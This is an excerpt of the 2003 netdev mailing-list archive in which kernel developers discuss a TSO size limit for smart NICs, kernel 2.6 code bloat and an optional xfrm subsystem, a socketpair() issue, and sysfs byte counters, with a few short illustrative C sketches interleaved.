:-) From scott.feldman@intel.com Wed Jul 23 11:44:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:44:57 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIirFl013247 for ; Wed, 23 Jul 2003 11:44:54 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6NIgfG22763 for ; Wed, 23 Jul 2003 18:42:41 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6NI9H705641 for ; Wed, 23 Jul 2003 18:09:17 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003072311563203074 ; Wed, 23 Jul 2003 11:56:32 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Wed, 23 Jul 2003 11:44:46 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: Limit skb to be less than 64K with TSO Date: Wed, 23 Jul 2003 11:44:46 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Limit skb to be less than 64K with TSO Thread-Index: AcNQdZja5LXyYcS/TH691cFLiDkcYQA1HdkQ From: "Feldman, Scott" To: "Alan Shih" , X-OriginalArrivalTime: 23 Jul 2003 18:44:46.0713 (UTC) FILETIME=[7D3DAE90:01C3514A] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NIirFl013247 X-archive-position: 4259 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > I am writing driver + 
smart NIC's firmware. The smart NIC > has limited memory. It can do checksum and TSO but with 32K max. Do we need a netdev->tso_max so the driver can advertise the maximum TSO send support by h/w? From davem@redhat.com Wed Jul 23 11:52:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:52:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIqsFl014439 for ; Wed, 23 Jul 2003 11:52:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11191; Wed, 23 Jul 2003 11:50:32 -0700 Date: Wed, 23 Jul 2003 11:50:32 -0700 From: "David S. Miller" To: "Feldman, Scott" Cc: alan@storlinksemi.com, netdev@oss.sgi.com, kuznet@ms2.inr.ac.ru Subject: Re: Limit skb to be less than 64K with TSO Message-Id: <20030723115032.3f8a95ed.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4260 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:44:46 -0700 "Feldman, Scott" wrote: > > I am writing driver + smart NIC's firmware. The smart NIC > > has limited memory. It can do checksum and TSO but with 32K max. > > Do we need a netdev->tso_max so the driver can advertise the maximum TSO > send support by h/w?

Maybe, it's easy to implement.

Add netdev->tso_max

Add sk->sk_tso_max right after sk->sk_route_caps

When sk->sk_route_caps is set, fetch netdev->tso_max via route and put into sk->sk_tso_max.

Replace "65535" constant in tcp_sync_mss with sk->sk_tso_max.

That should be it.
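
Editor's sketch of the four steps listed above, written as a small userspace C model rather than kernel code. Only netdev->tso_max, sk->sk_tso_max and the 65535 constant come from the message; the struct names netdev_model and sock_model, the helper names, and the rule that a tso_max of 0 means "no limit advertised" are assumptions made for illustration. Rounding the result down to a whole multiple of the MSS is likewise an assumption about how the limit would be consumed.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-ins for struct net_device and struct sock. */
struct netdev_model {
    uint32_t tso_max;      /* proposed field; 0 = driver advertises no limit (assumed) */
};

struct sock_model {
    uint32_t sk_tso_max;   /* proposed per-socket copy, cached when caps are set */
};

#define TSO_DEFAULT_MAX 65535u   /* the constant the message proposes to replace */

/* Steps 1-3: copy the device limit into the socket when route caps are set. */
static void sock_set_tso_max(struct sock_model *sk, const struct netdev_model *dev)
{
    assert(sk && dev);
    uint32_t limit = dev->tso_max;

    /* Fall back to the old constant if the driver gave no usable limit. */
    if (limit == 0 || limit > TSO_DEFAULT_MAX)
        limit = TSO_DEFAULT_MAX;
    sk->sk_tso_max = limit;
}

/* Step 4: size a large send from sk_tso_max instead of 65535.
 * Returns the largest multiple of mss that fits once header_len
 * bytes of protocol headers are subtracted; never less than mss. */
static uint32_t tso_large_mss(const struct sock_model *sk,
                              uint32_t mss, uint32_t header_len)
{
    assert(mss > 0);
    if (sk->sk_tso_max <= header_len)
        return mss;

    uint32_t room = sk->sk_tso_max - header_len;
    uint32_t factor = room / mss;
    if (factor == 0)
        factor = 1;
    return factor * mss;
}
```

With a 32K device limit, a 1448-byte MSS and 52 bytes of headers, this model allows at most 22 full segments per send; with no advertised limit it falls back to the 65535 ceiling.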
From hch@infradead.org Wed Jul 23 11:53:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:54:04 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIruFl014791 for ; Wed, 23 Jul 2003 11:53:58 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOkN-0007Bq-00; Wed, 23 Jul 2003 19:53:55 +0100 Date: Wed, 23 Jul 2003 19:53:55 +0100 From: Christoph Hellwig To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723195355.A27597@infradead.org> Mail-Followup-To: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-archive-position: 4261 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev

I think this is not only of interest for the uClinux folks..

----- Forwarded message from Bernardo Innocenti ----- Date: Wed, 23 Jul 2003 20:46:46 +0200 From: Bernardo Innocenti Subject: Kernel 2.6 size increase To: uClinux development list Cc: linux-kernel@vger.kernel.org

Hello,

code bloat can be very harmful on embedded targets, but it's generally inconvenient for any platform. I've measured the code increase between 2.4.21 and 2.6.0-test1 on a small kernel configuration for ColdFire:

   text    data     bss     dec     hex filename
 640564   39152  134260  813976   c6b98 linux-2.4.x/linux
 845924   51204   78896  976024   ee498 linux-2.5.x/vmlinux

I could provide the exact .config file for both kernels to anybody interested. They are almost the same: no filesystems except JFFS2, IPv4 and a bunch of small drivers. I have no SMP, security, futexes, modules and anything else not strictly needed to execute processes.
I've made a linker map file and compared the size of individual subsystems. These are the major contributors to the size increase:

kernel/ +27KB
mm/ +14KB
fs/ +47KB
drivers/ +35KB
net/ +64KB

I've dug into net/ with nm -S --size-sort. It seems that the major increase is caused by net/xfrm/. Could this module be made optional?

In fs/, almost all modules have grown by 30-40%, so the bloat is probably caused by inlines and macros getting more complex.

Block drivers and MTD have generally become smaller. Character devices are responsible for most of the size increase in drivers/.

-- // Bernardo Innocenti - Develer S.r.l., R&D dept. \X/ http://www.develer.com/ Please don't send Word attachments - http://www.gnu.org/philosophy/no-word-attachments.html - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ ----- End forwarded message -----
From gsf@research.att.com Wed Jul 23 11:54:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:54:59 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIstFl015152 for ; Wed, 23 Jul 2003 11:54:55 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJBxJh029160; Wed, 23 Jul 2003 15:11:59 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id OAA90112; Wed, 23 Jul 2003 14:54:49 -0400 (EDT) Date: Wed, 23 Jul 2003 14:54:49 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231854.OAA90112@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References:
<200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4262 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:23:07 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) > Glenn Fowler wrote: > > named sockets seem a little heavyweight for this application > I think it'll be cheaper than unnamed unix sockets and > groveling in /proc/*/fd/ > And even if there is a minor performance issue, you'll more than get > that back due to the portability gain. :-) named unix sockets reside in the fs namespace, no? so they must be linked to a dir before use and unlinked after use the unlink after use would be particularly tricky for the parent process implementing cmd <(cmd ...) ... 
From hch@infradead.org Wed Jul 23 11:55:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:55:10 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIt5Fl015239 for ; Wed, 23 Jul 2003 11:55:06 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOlV-0007CJ-00; Wed, 23 Jul 2003 19:55:05 +0100 Date: Wed, 23 Jul 2003 19:55:04 +0100 From: Christoph Hellwig To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723195504.A27656@infradead.org> Mail-Followup-To: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723195355.A27597@infradead.org>; from hch@infradead.org on Wed, Jul 23, 2003 at 07:53:55PM +0100 X-archive-position: 4263 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 07:53:55PM +0100, Christoph Hellwig wrote: > I think this is not only of interest for the uClinux folks.. Sorry, this actually already Cc'ed lkml :) Still the netdev folks should read it, too. From davem@redhat.com Wed Jul 23 12:01:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:01:25 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ1KFl016606 for ; Wed, 23 Jul 2003 12:01:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11238; Wed, 23 Jul 2003 11:58:59 -0700 Date: Wed, 23 Jul 2003 11:58:58 -0700 From: "David S.
Miller" To: Christoph Hellwig Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-Id: <20030723115858.75068294.davem@redhat.com> In-Reply-To: <20030723195504.A27656@infradead.org> References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4264 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 19:55:04 +0100 Christoph Hellwig wrote: > On Wed, Jul 23, 2003 at 07:53:55PM +0100, Christoph Hellwig wrote: > > I think this is not only of interest fir the uClinux folks.. > > Sorry, this actually already Cc'ed lkml :) Still the netdev folks > should read it, too. Well, we gained some code and a little bit of data, but the BSS was cut in half which I think deserves noticing :-) Also, he should analyze the amount of code that actually gets executed for various tasks, comparing 2.4.x to 2.5.x I'd take a half-meg code size hit if it meant that all the normal code paths got cut in half :-) From hch@infradead.org Wed Jul 23 12:07:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:07:06 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ70Fl017284 for ; Wed, 23 Jul 2003 12:07:01 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fOx0-0007FY-00; Wed, 23 Jul 2003 20:06:58 +0100 Date: Wed, 23 Jul 2003 20:06:58 +0100 From: Christoph Hellwig To: "David S. 
Miller" Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723200658.A27856@infradead.org> Mail-Followup-To: Christoph Hellwig , "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723115858.75068294.davem@redhat.com>; from davem@redhat.com on Wed, Jul 23, 2003 at 11:58:58AM -0700 X-archive-position: 4265 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 11:58:58AM -0700, David S. Miller wrote: > > Sorry, this actually already Cc'ed lkml :) Still the netdev folks > > should read it, too. > > Well, we gained some code and a little bit of data, but > the BSS was cut in half which I think deserves noticing :-) > > Also, he should analyze the amount of code that actually > gets executed for various tasks, comparing 2.4.x to 2.5.x > > I'd take a half-meg code size hit if it meant that all > the normal code paths got cut in half :-) Half a megabyte more code size is a lot if you're based on flash. I know you absolutely disliked Andi's patch to make the xfrm subsystem optional, so we might need to find other ways to make the code smaller on those systems that need it. Now I could talk a lot but I'm really no networking insider, so it's hard for me to suggest where to start. I'd rather look at the fs/ issue, but it would be nice if networking folks could do their part, too.
From davem@redhat.com Wed Jul 23 12:07:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:07:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJ7GFl017336 for ; Wed, 23 Jul 2003 12:07:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11290; Wed, 23 Jul 2003 12:04:57 -0700 Date: Wed, 23 Jul 2003 12:04:57 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723120457.206dc02d.davem@redhat.com> In-Reply-To: <200307231854.OAA90112@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4266 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 14:54:49 -0400 (EDT) Glenn Fowler wrote: > On Wed, 23 Jul 2003 11:23:07 -0700 David S. 
Miller wrote: > > On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) > > Glenn Fowler wrote: > > > > named sockets seem a little heavyweight for this application > > > I think it'll be cheaper than unnamed unix sockets and > > groveling in /proc/*/fd/ > > > And even if there is a minor performance issue, you'll more than get > > that back due to the portability gain. :-) > > named unix sockets reside in the fs namespace, no? Right. > so they must be linked to a dir before use and unlinked after use > the unlink after use would be particularly tricky for the parent process > implementing > cmd <(cmd ...) ... Hmmm... true. I honestly don't know what to suggest you use, sorry :( Is bash totally broken because of all this? Or does the problem only trigger when using (cmd) subprocesses in a certain way? From seanlkml@rogers.com Wed Jul 23 12:10:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:10:38 -0700 (PDT) Received: from fep01-mail.bloor.is.net.cable.rogers.com (fep01-mail.bloor.is.net.cable.rogers.com [66.185.86.71]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJAXFl018103 for ; Wed, 23 Jul 2003 12:10:33 -0700 Received: from lappy7 ([24.102.213.108]) by fep01-mail.bloor.is.net.cable.rogers.com (InterMail vM.5.01.05.12 201-253-122-126-112-20020820) with ESMTP id <20030723190958.TQRO427382.fep01-mail.bloor.is.net.cable.rogers.com@lappy7> for ; Wed, 23 Jul 2003 15:09:58 -0400 Message-ID: <000901c3514e$59697bd0$7f0a0a0a@lappy7> Reply-To: "Sean" From: "Sean" To: Subject: Trivial cosmetic unimportant issue (urgent) Date: Wed, 23 Jul 2003 15:12:24 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-Authentication-Info: Submitted using SMTP AUTH LOGIN at fep01-mail.bloor.is.net.cable.rogers.com from [24.102.213.108] using ID at Wed, 23 Jul 2003 15:09:57 -0400 
X-archive-position: 4267 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: seanlkml@rogers.com Precedence: bulk X-list: netdev Hi folks, Just a few days uptime and sysfs is reporting that I've transferred a _negative_ number of bytes! Any chance this could be unsigned output instead? The display is created in a common net_device_stat_show, but none of the other values should go negative either. Cheers, Sean From davem@redhat.com Wed Jul 23 12:11:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:11:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJBLFl018440 for ; Wed, 23 Jul 2003 12:11:21 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id MAA11304; Wed, 23 Jul 2003 12:09:02 -0700 Date: Wed, 23 Jul 2003 12:09:01 -0700 From: "David S. 
Miller" To: Christoph Hellwig Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-Id: <20030723120901.57746fd8.davem@redhat.com> In-Reply-To: <20030723200658.A27856@infradead.org> References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> <20030723200658.A27856@infradead.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4268 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 20:06:58 +0100 Christoph Hellwig wrote: > I know you absolutely disliked Andi's patch to make the xfrm subsystem > optional so we might need find other ways to make the code smaller > on those systems that need it. I'm willing to reconsider it. So basically we'd have a CONFIG_NET_XFRM, and things like AH/ESP/IPCOMP/AH6/ESP6/IPCOMP6 would say "select NET_XFRM" in the Kconfig where they are selected. Then when CONFIG_NET_XFRM is not set all the xfrm interfaces called from non-ipsec non-xfrm source files get NOP versions. Is this exactly what Andi's patch did? Just send it on so we can integrate this. We actually lost a lot of code in other areas of the networking, for example Andrew Morton and I made many bogus function inlines undone because they made the code too large. 
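
A minimal user-space sketch of the stub pattern described in the message above. All names here (demo_xfrm_policy_check, demo_receive, struct demo_pkt) are hypothetical and are not taken from Andi's patch or from the kernel tree; the only thing borrowed from the thread is the CONFIG_NET_XFRM symbol. The idea is that when the option is not set, callers compile against an inline NOP and need no #ifdef of their own.

```c
#include <stddef.h>

/* Hypothetical stand-in for a packet; the kernel would use struct sk_buff. */
struct demo_pkt {
	size_t len;
};

#ifdef CONFIG_NET_XFRM
/* With the option set, the real check would live in the xfrm code
 * (not shown in this sketch). */
int demo_xfrm_policy_check(const struct demo_pkt *pkt);
#else
/* NOP version: with no transforms built in, every packet passes. */
static inline int demo_xfrm_policy_check(const struct demo_pkt *pkt)
{
	(void)pkt;
	return 1;
}
#endif

/* A non-ipsec caller: it looks the same whether or not the option is set. */
long demo_receive(const struct demo_pkt *pkt)
{
	if (!demo_xfrm_policy_check(pkt))
		return -1;		/* dropped by policy */
	return (long)pkt->len;		/* accepted */
}
```

Built without -DCONFIG_NET_XFRM, the compiler can inline the stub and drop the branch entirely, which is where the code size saving would come from.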
From gsf@research.att.com Wed Jul 23 12:11:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:11:59 -0700 (PDT) Received: from mailman.research.att.com (H-135-207-24-32.research.att.com [135.207.24.32]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJBrFl018677 for ; Wed, 23 Jul 2003 12:11:54 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by mailman.research.att.com (8.12.8/8.12.8) with ESMTP id h6NJ3q3j022626; Wed, 23 Jul 2003 15:03:52 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id PAA35164; Wed, 23 Jul 2003 15:11:47 -0400 (EDT) Date: Wed, 23 Jul 2003 15:11:47 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231911.PAA35164@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> <20030723112307.5b8ae55c.davem@redhat.com> <200307231854.OAA90112@raptor.research.att.com> <20030723120457.206dc02d.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4269 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:04:57 -0700 David S. Miller wrote: > Is bash totally broken because of all this? Or does the problem only > trigger when using (cmd) subprocesses in a certain way? 
bash uses pipe() so its ok using socketpair() instead of pipe() introduces the problem and we will now have to find an alternative to work around the linux /dev/fd/N implementation thanks From hch@infradead.org Wed Jul 23 12:13:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:13:43 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJDcFl019242 for ; Wed, 23 Jul 2003 12:13:39 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19fP3P-0007Hh-00; Wed, 23 Jul 2003 20:13:35 +0100 Date: Wed, 23 Jul 2003 20:13:35 +0100 From: Christoph Hellwig To: "David S. Miller" Cc: Christoph Hellwig , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [bernie@develer.com: Kernel 2.6 size increase] Message-ID: <20030723201335.A27990@infradead.org> Mail-Followup-To: Christoph Hellwig , "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com References: <20030723195355.A27597@infradead.org> <20030723195504.A27656@infradead.org> <20030723115858.75068294.davem@redhat.com> <20030723200658.A27856@infradead.org> <20030723120901.57746fd8.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030723120901.57746fd8.davem@redhat.com>; from davem@redhat.com on Wed, Jul 23, 2003 at 12:09:01PM -0700 X-archive-position: 4270 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 12:09:01PM -0700, David S. Miller wrote: > So basically we'd have a CONFIG_NET_XFRM, and things like > AH/ESP/IPCOMP/AH6/ESP6/IPCOMP6 would say "select NET_XFRM" > in the Kconfig where they are selected. 
> > Then when CONFIG_NET_XFRM is not set all the xfrm interfaces > called from non-ipsec non-xfrm source files get NOP versions. > > Is this exactly what Andi's patch did? Just send it on > so we can integrate this. I think that's what it did modula the select which IIRC wasn't available back then. But I guess I'll rather leave this to Andi. > We actually lost a lot of code in other areas of the networking, for > example Andrew Morton and I made many bogus function inlines > undone because they made the code too large. That's cool! Now we just need to find a bunch more regressions and actually make 2.6 smaller than 2.4 :) Of course that's true for the other subsystems, too. From alan@lxorguk.ukuu.org.uk Wed Jul 23 12:14:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 12:14:23 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NJEHFl019508 for ; Wed, 23 Jul 2003 12:14:18 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NJ9DI5006570; Wed, 23 Jul 2003 20:09:34 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NJ8MpK006568; Wed, 23 Jul 2003 20:08:22 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: kernel bug in socketpair() From: Alan Cox To: Glenn Fowler Cc: davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com In-Reply-To: <200307231854.OAA90112@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> 
